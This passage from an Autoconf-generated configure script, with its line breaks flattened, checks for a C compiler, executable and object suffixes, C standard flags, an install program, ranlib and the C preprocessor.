"%s\n" "$CC" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi test -n "$CC" && break done fi if test -z "$CC"; then ac_ct_CC=$CC for ac_prog in cl.exe do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_ac_ct_CC+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$ac_ct_CC"; then ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_CC="$ac_prog" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi ;; esac fi ac_ct_CC=$ac_cv_prog_ac_ct_CC if test -n "$ac_ct_CC"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 printf "%s\n" "$ac_ct_CC" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi test -n "$ac_ct_CC" && break done if test "x$ac_ct_CC" = x; then CC="" else case $cross_compiling:$ac_tool_warned in yes:) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 printf "%s\n" "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac CC=$ac_ct_CC fi fi fi if test -z "$CC"; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}clang", so it can be a program name with args. set dummy ${ac_tool_prefix}clang; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_CC+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then ac_cv_prog_CC="${ac_tool_prefix}clang" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi ;; esac fi CC=$ac_cv_prog_CC if test -n "$CC"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 printf "%s\n" "$CC" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi fi if test -z "$ac_cv_prog_CC"; then ac_ct_CC=$CC # Extract the first word of "clang", so it can be a program name with args. set dummy clang; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_ac_ct_CC+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$ac_ct_CC"; then ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_CC="clang" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi ;; esac fi ac_ct_CC=$ac_cv_prog_ac_ct_CC if test -n "$ac_ct_CC"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 printf "%s\n" "$ac_ct_CC" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi if test "x$ac_ct_CC" = x; then CC="" else case $cross_compiling:$ac_tool_warned in yes:) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 printf "%s\n" "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac CC=$ac_ct_CC fi else CC="$ac_cv_prog_CC" fi fi test -z "$CC" && { { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: in '$ac_pwd':" >&5 printf "%s\n" "$as_me: error: in '$ac_pwd':" >&2;} as_fn_error $? "no acceptable C compiler found in \$PATH See 'config.log' for more details" "$LINENO" 5; } # Provide some information about the compiler. printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for C compiler version" >&5 set X $ac_compile ac_compiler=$2 for ac_option in --version -v -V -qversion -version; do { { ac_try="$ac_compiler $ac_option >&5" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_compiler $ac_option >&5") 2>conftest.err ac_status=$? if test -s conftest.err; then sed '10a\ ... rest of stderr output deleted ... 10q' conftest.err >conftest.er1 cat conftest.er1 >&5 fi rm -f conftest.er1 conftest.err printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } done cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main (void) { ; return 0; } _ACEOF ac_clean_files_save=$ac_clean_files ac_clean_files="$ac_clean_files a.out a.out.dSYM a.exe b.out" # Try to create an executable without -o first, disregard a.out. # It will help us diagnose broken compilers, and finding out an intuition # of exeext. { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking whether the C compiler works" >&5 printf %s "checking whether the C compiler works... " >&6; } ac_link_default=`printf "%s\n" "$ac_link" | sed 's/ -o *conftest[^ ]*//'` # The possible output files: ac_files="a.out conftest.exe conftest a.exe a_out.exe b.out conftest.*" ac_rmfiles= for ac_file in $ac_files do case $ac_file in *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; * ) ac_rmfiles="$ac_rmfiles $ac_file";; esac done rm -f $ac_rmfiles if { { ac_try="$ac_link_default" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_link_default") 2>&5 ac_status=$? printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } then : # Autoconf-2.13 could set the ac_cv_exeext variable to 'no'. # So ignore a value of 'no', otherwise this would lead to 'EXEEXT = no' # in a Makefile. We should not override ac_cv_exeext if it was cached, # so that the user can short-circuit this test for compilers unknown to # Autoconf. for ac_file in $ac_files '' do test -f "$ac_file" || continue case $ac_file in *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; [ab].out ) # We found the default executable, but exeext='' is most # certainly right. break;; *.* ) if test ${ac_cv_exeext+y} && test "$ac_cv_exeext" != no; then :; else ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` fi # We set ac_cv_exeext here because the later test for it is not # safe: cross compilers may not add the suffix if given an '-o' # argument, so we may need to know it at that point already. # Even if this section looks crufty: it has the advantage of # actually working. break;; * ) break;; esac done test "$ac_cv_exeext" = no && ac_cv_exeext= else case e in #( e) ac_file='' ;; esac fi if test -z "$ac_file" then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } printf "%s\n" "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 { { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: in '$ac_pwd':" >&5 printf "%s\n" "$as_me: error: in '$ac_pwd':" >&2;} as_fn_error 77 "C compiler cannot create executables See 'config.log' for more details" "$LINENO" 5; } else case e in #( e) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: yes" >&5 printf "%s\n" "yes" >&6; } ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for C compiler default output file name" >&5 printf %s "checking for C compiler default output file name... " >&6; } { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_file" >&5 printf "%s\n" "$ac_file" >&6; } ac_exeext=$ac_cv_exeext rm -f -r a.out a.out.dSYM a.exe conftest$ac_cv_exeext b.out ac_clean_files=$ac_clean_files_save { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for suffix of executables" >&5 printf %s "checking for suffix of executables... " >&6; } if { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_link") 2>&5 ac_status=$? printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } then : # If both 'conftest.exe' and 'conftest' are 'present' (well, observable) # catch 'conftest.exe'. For instance with Cygwin, 'ls conftest' will # work properly (i.e., refer to 'conftest.exe'), while it won't with # 'rm'. for ac_file in conftest.exe conftest conftest.*; do test -f "$ac_file" || continue case $ac_file in *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` break;; * ) break;; esac done else case e in #( e) { { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: in '$ac_pwd':" >&5 printf "%s\n" "$as_me: error: in '$ac_pwd':" >&2;} as_fn_error $? "cannot compute suffix of executables: cannot compile and link See 'config.log' for more details" "$LINENO" 5; } ;; esac fi rm -f conftest conftest$ac_cv_exeext { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_exeext" >&5 printf "%s\n" "$ac_cv_exeext" >&6; } rm -f conftest.$ac_ext EXEEXT=$ac_cv_exeext ac_exeext=$EXEEXT cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include int main (void) { FILE *f = fopen ("conftest.out", "w"); if (!f) return 1; return ferror (f) || fclose (f) != 0; ; return 0; } _ACEOF ac_clean_files="$ac_clean_files conftest.out" # Check that the compiler produces executables we can run. If not, either # the compiler is broken, or we cross compile. { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking whether we are cross compiling" >&5 printf %s "checking whether we are cross compiling... " >&6; } if test "$cross_compiling" != yes; then { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_link") 2>&5 ac_status=$? printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } if { ac_try='./conftest$ac_cv_exeext' { { case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_try") 2>&5 ac_status=$? printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; }; then cross_compiling=no else if test "$cross_compiling" = maybe; then cross_compiling=yes else { { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: in '$ac_pwd':" >&5 printf "%s\n" "$as_me: error: in '$ac_pwd':" >&2;} as_fn_error 77 "cannot run C compiled programs. If you meant to cross compile, use '--host'. See 'config.log' for more details" "$LINENO" 5; } fi fi fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $cross_compiling" >&5 printf "%s\n" "$cross_compiling" >&6; } rm -f conftest.$ac_ext conftest$ac_cv_exeext \ conftest.o conftest.obj conftest.out ac_clean_files=$ac_clean_files_save { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for suffix of object files" >&5 printf %s "checking for suffix of object files... " >&6; } if test ${ac_cv_objext+y} then : printf %s "(cached) " >&6 else case e in #( e) cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main (void) { ; return 0; } _ACEOF rm -f conftest.o conftest.obj if { { ac_try="$ac_compile" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" printf "%s\n" "$ac_try_echo"; } >&5 (eval "$ac_compile") 2>&5 ac_status=$? printf "%s\n" "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } then : for ac_file in conftest.o conftest.obj conftest.*; do test -f "$ac_file" || continue; case $ac_file in *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;; *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'` break;; esac done else case e in #( e) printf "%s\n" "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 { { printf "%s\n" "$as_me:${as_lineno-$LINENO}: error: in '$ac_pwd':" >&5 printf "%s\n" "$as_me: error: in '$ac_pwd':" >&2;} as_fn_error $? "cannot compute suffix of object files: cannot compile See 'config.log' for more details" "$LINENO" 5; } ;; esac fi rm -f conftest.$ac_cv_objext conftest.$ac_ext ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_objext" >&5 printf "%s\n" "$ac_cv_objext" >&6; } OBJEXT=$ac_cv_objext ac_objext=$OBJEXT { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking whether the compiler supports GNU C" >&5 printf %s "checking whether the compiler supports GNU C... " >&6; } if test ${ac_cv_c_compiler_gnu+y} then : printf %s "(cached) " >&6 else case e in #( e) cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main (void) { #ifndef __GNUC__ choke me #endif ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO" then : ac_compiler_gnu=yes else case e in #( e) ac_compiler_gnu=no ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam conftest.$ac_ext ac_cv_c_compiler_gnu=$ac_compiler_gnu ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_c_compiler_gnu" >&5 printf "%s\n" "$ac_cv_c_compiler_gnu" >&6; } ac_compiler_gnu=$ac_cv_c_compiler_gnu if test $ac_compiler_gnu = yes; then GCC=yes else GCC= fi ac_test_CFLAGS=${CFLAGS+y} ac_save_CFLAGS=$CFLAGS { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking whether $CC accepts -g" >&5 printf %s "checking whether $CC accepts -g... " >&6; } if test ${ac_cv_prog_cc_g+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_save_c_werror_flag=$ac_c_werror_flag ac_c_werror_flag=yes ac_cv_prog_cc_g=no CFLAGS="-g" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main (void) { ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO" then : ac_cv_prog_cc_g=yes else case e in #( e) CFLAGS="" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main (void) { ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO" then : else case e in #( e) ac_c_werror_flag=$ac_save_c_werror_flag CFLAGS="-g" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main (void) { ; return 0; } _ACEOF if ac_fn_c_try_compile "$LINENO" then : ac_cv_prog_cc_g=yes fi rm -f core conftest.err conftest.$ac_objext conftest.beam conftest.$ac_ext ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam conftest.$ac_ext ;; esac fi rm -f core conftest.err conftest.$ac_objext conftest.beam conftest.$ac_ext ac_c_werror_flag=$ac_save_c_werror_flag ;; esac fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_g" >&5 printf "%s\n" "$ac_cv_prog_cc_g" >&6; } if test $ac_test_CFLAGS; then CFLAGS=$ac_save_CFLAGS elif test $ac_cv_prog_cc_g = yes; then if test "$GCC" = yes; then CFLAGS="-g -O2" else CFLAGS="-g" fi else if test "$GCC" = yes; then CFLAGS="-O2" else CFLAGS= fi fi ac_prog_cc_stdc=no if test x$ac_prog_cc_stdc = xno then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $CC option to enable C11 features" >&5 printf %s "checking for $CC option to enable C11 features... " >&6; } if test ${ac_cv_prog_cc_c11+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_cv_prog_cc_c11=no ac_save_CC=$CC cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ $ac_c_conftest_c11_program _ACEOF for ac_arg in '' -std=gnu11 do CC="$ac_save_CC $ac_arg" if ac_fn_c_try_compile "$LINENO" then : ac_cv_prog_cc_c11=$ac_arg fi rm -f core conftest.err conftest.$ac_objext conftest.beam test "x$ac_cv_prog_cc_c11" != "xno" && break done rm -f conftest.$ac_ext CC=$ac_save_CC ;; esac fi if test "x$ac_cv_prog_cc_c11" = xno then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: unsupported" >&5 printf "%s\n" "unsupported" >&6; } else case e in #( e) if test "x$ac_cv_prog_cc_c11" = x then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: none needed" >&5 printf "%s\n" "none needed" >&6; } else case e in #( e) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_c11" >&5 printf "%s\n" "$ac_cv_prog_cc_c11" >&6; } CC="$CC $ac_cv_prog_cc_c11" ;; esac fi ac_cv_prog_cc_stdc=$ac_cv_prog_cc_c11 ac_prog_cc_stdc=c11 ;; esac fi fi if test x$ac_prog_cc_stdc = xno then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $CC option to enable C99 features" >&5 printf %s "checking for $CC option to enable C99 features... " >&6; } if test ${ac_cv_prog_cc_c99+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_cv_prog_cc_c99=no ac_save_CC=$CC cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ $ac_c_conftest_c99_program _ACEOF for ac_arg in '' -std=gnu99 -std=c99 -c99 -qlanglvl=extc1x -qlanglvl=extc99 -AC99 -D_STDC_C99= do CC="$ac_save_CC $ac_arg" if ac_fn_c_try_compile "$LINENO" then : ac_cv_prog_cc_c99=$ac_arg fi rm -f core conftest.err conftest.$ac_objext conftest.beam test "x$ac_cv_prog_cc_c99" != "xno" && break done rm -f conftest.$ac_ext CC=$ac_save_CC ;; esac fi if test "x$ac_cv_prog_cc_c99" = xno then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: unsupported" >&5 printf "%s\n" "unsupported" >&6; } else case e in #( e) if test "x$ac_cv_prog_cc_c99" = x then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: none needed" >&5 printf "%s\n" "none needed" >&6; } else case e in #( e) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_c99" >&5 printf "%s\n" "$ac_cv_prog_cc_c99" >&6; } CC="$CC $ac_cv_prog_cc_c99" ;; esac fi ac_cv_prog_cc_stdc=$ac_cv_prog_cc_c99 ac_prog_cc_stdc=c99 ;; esac fi fi if test x$ac_prog_cc_stdc = xno then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $CC option to enable C89 features" >&5 printf %s "checking for $CC option to enable C89 features... " >&6; } if test ${ac_cv_prog_cc_c89+y} then : printf %s "(cached) " >&6 else case e in #( e) ac_cv_prog_cc_c89=no ac_save_CC=$CC cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ $ac_c_conftest_c89_program _ACEOF for ac_arg in '' -qlanglvl=extc89 -qlanglvl=ansi -std -Ae "-Aa -D_HPUX_SOURCE" "-Xc -D__EXTENSIONS__" do CC="$ac_save_CC $ac_arg" if ac_fn_c_try_compile "$LINENO" then : ac_cv_prog_cc_c89=$ac_arg fi rm -f core conftest.err conftest.$ac_objext conftest.beam test "x$ac_cv_prog_cc_c89" != "xno" && break done rm -f conftest.$ac_ext CC=$ac_save_CC ;; esac fi if test "x$ac_cv_prog_cc_c89" = xno then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: unsupported" >&5 printf "%s\n" "unsupported" >&6; } else case e in #( e) if test "x$ac_cv_prog_cc_c89" = x then : { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: none needed" >&5 printf "%s\n" "none needed" >&6; } else case e in #( e) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cc_c89" >&5 printf "%s\n" "$ac_cv_prog_cc_c89" >&6; } CC="$CC $ac_cv_prog_cc_c89" ;; esac fi ac_cv_prog_cc_stdc=$ac_cv_prog_cc_c89 ac_prog_cc_stdc=c89 ;; esac fi fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu # Find a good install program. We prefer a C program (faster), # so one script is as good as another. But avoid the broken or # incompatible versions: # SysV /etc/install, /usr/sbin/install # SunOS /usr/etc/install # IRIX /sbin/install # AIX /bin/install # AmigaOS /C/install, which installs bootblocks on floppy discs # AIX 4 /usr/bin/installbsd, which doesn't work without a -g flag # AFS /usr/afsws/bin/install, which mishandles nonexistent args # SVR4 /usr/ucb/install, which tries to use the nonexistent group "staff" # OS/2's system install, which has a completely different semantic # ./install, which can be erroneously created by make from ./install.sh. # Reject install programs that cannot install multiple files. { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for a BSD-compatible install" >&5 printf %s "checking for a BSD-compatible install... " >&6; } if test -z "$INSTALL"; then if test ${ac_cv_path_install+y} then : printf %s "(cached) " >&6 else case e in #( e) as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac # Account for fact that we put trailing slashes in our PATH walk. case $as_dir in #(( ./ | /[cC]/* | \ /etc/* | /usr/sbin/* | /usr/etc/* | /sbin/* | /usr/afsws/bin/* | \ ?:[\\/]os2[\\/]install[\\/]* | ?:[\\/]OS2[\\/]INSTALL[\\/]* | \ /usr/ucb/* ) ;; *) # OSF1 and SCO ODT 3.0 have their own names for install. # Don't use installbsd from OSF since it installs stuff as root # by default. for ac_prog in ginstall scoinst install; do for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_prog$ac_exec_ext"; then if test $ac_prog = install && grep dspmsg "$as_dir$ac_prog$ac_exec_ext" >/dev/null 2>&1; then # AIX install. It has an incompatible calling convention. : elif test $ac_prog = install && grep pwplus "$as_dir$ac_prog$ac_exec_ext" >/dev/null 2>&1; then # program-specific install script used by HP pwplus--don't use. : else rm -rf conftest.one conftest.two conftest.dir echo one > conftest.one echo two > conftest.two mkdir conftest.dir if "$as_dir$ac_prog$ac_exec_ext" -c conftest.one conftest.two "`pwd`/conftest.dir/" && test -s conftest.one && test -s conftest.two && test -s conftest.dir/conftest.one && test -s conftest.dir/conftest.two then ac_cv_path_install="$as_dir$ac_prog$ac_exec_ext -c" break 3 fi fi fi done done ;; esac done IFS=$as_save_IFS rm -rf conftest.one conftest.two conftest.dir ;; esac fi if test ${ac_cv_path_install+y}; then INSTALL=$ac_cv_path_install else # As a last resort, use the slow shell script. Don't cache a # value for INSTALL within a source directory, because that will # break other packages using the cache if that directory is # removed, or if the value is a relative name. INSTALL=$ac_install_sh fi fi { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $INSTALL" >&5 printf "%s\n" "$INSTALL" >&6; } # Use test -z because SunOS4 sh mishandles braces in ${var-val}. # It thinks the first close brace ends the variable substitution. test -z "$INSTALL_PROGRAM" && INSTALL_PROGRAM='${INSTALL}' test -z "$INSTALL_SCRIPT" && INSTALL_SCRIPT='${INSTALL}' test -z "$INSTALL_DATA" && INSTALL_DATA='${INSTALL} -m 644' if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}ranlib", so it can be a program name with args. set dummy ${ac_tool_prefix}ranlib; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_RANLIB+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$RANLIB"; then ac_cv_prog_RANLIB="$RANLIB" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then ac_cv_prog_RANLIB="${ac_tool_prefix}ranlib" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi ;; esac fi RANLIB=$ac_cv_prog_RANLIB if test -n "$RANLIB"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $RANLIB" >&5 printf "%s\n" "$RANLIB" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi fi if test -z "$ac_cv_prog_RANLIB"; then ac_ct_RANLIB=$RANLIB # Extract the first word of "ranlib", so it can be a program name with args. set dummy ranlib; ac_word=$2 { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 printf %s "checking for $ac_word... " >&6; } if test ${ac_cv_prog_ac_ct_RANLIB+y} then : printf %s "(cached) " >&6 else case e in #( e) if test -n "$ac_ct_RANLIB"; then ac_cv_prog_ac_ct_RANLIB="$ac_ct_RANLIB" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS case $as_dir in #((( '') as_dir=./ ;; */) ;; *) as_dir=$as_dir/ ;; esac for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_RANLIB="ranlib" printf "%s\n" "$as_me:${as_lineno-$LINENO}: found $as_dir$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi ;; esac fi ac_ct_RANLIB=$ac_cv_prog_ac_ct_RANLIB if test -n "$ac_ct_RANLIB"; then { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: $ac_ct_RANLIB" >&5 printf "%s\n" "$ac_ct_RANLIB" >&6; } else { printf "%s\n" "$as_me:${as_lineno-$LINENO}: result: no" >&5 printf "%s\n" "no" >&6; } fi if test "x$ac_ct_RANLIB" = x; then RANLIB=":" else case $cross_compiling:$ac_tool_warned in yes:) { printf "%s\n" "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 printf "%s\n" "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac RANLIB=$ac_ct_RANLIB fi else RANLIB="$ac_cv_prog_RANLIB" fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu { printf "%s\n" "$as_me:${as_lineno-$LINENO}: checking how to run the C preprocessor" >&5 printf %s "checking how to run the C preprocessor... " >&6; } # On Suns, sometimes $CPP names a directory. if test -n "$CPP" && test -d "$CPP"; then CPP= fi if test -z "$CPP"; then if test ${ac_cv_prog_CPP+y} then : printf %s "(cached) " >&6 else case e in #( e) # Double quotes because $CC needs to be expanded for CPP in "$CC -E" "$CC -E -traditional-cpp" cpp /lib/cpp do ac_preproc_ok=false for ac_c_preproc_warn_flag in '' yes do # Use a header file that comes with gcc, so configuring glibc # with a fresh cross-compiler works. # On the NeXT, cc -E runs the code through the compiler's parser, # not just through cpp. "Syntax error" is here to catch this case. cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include Syntax error _ACEOF if ac_fn_c_try_cpp "$LINENO" then : else case e in #( e) # Broken: fails on valid input. continue ;; esac fi rm -f conftest.err conftest.i conftest.$ac_ext # OK, works on sane 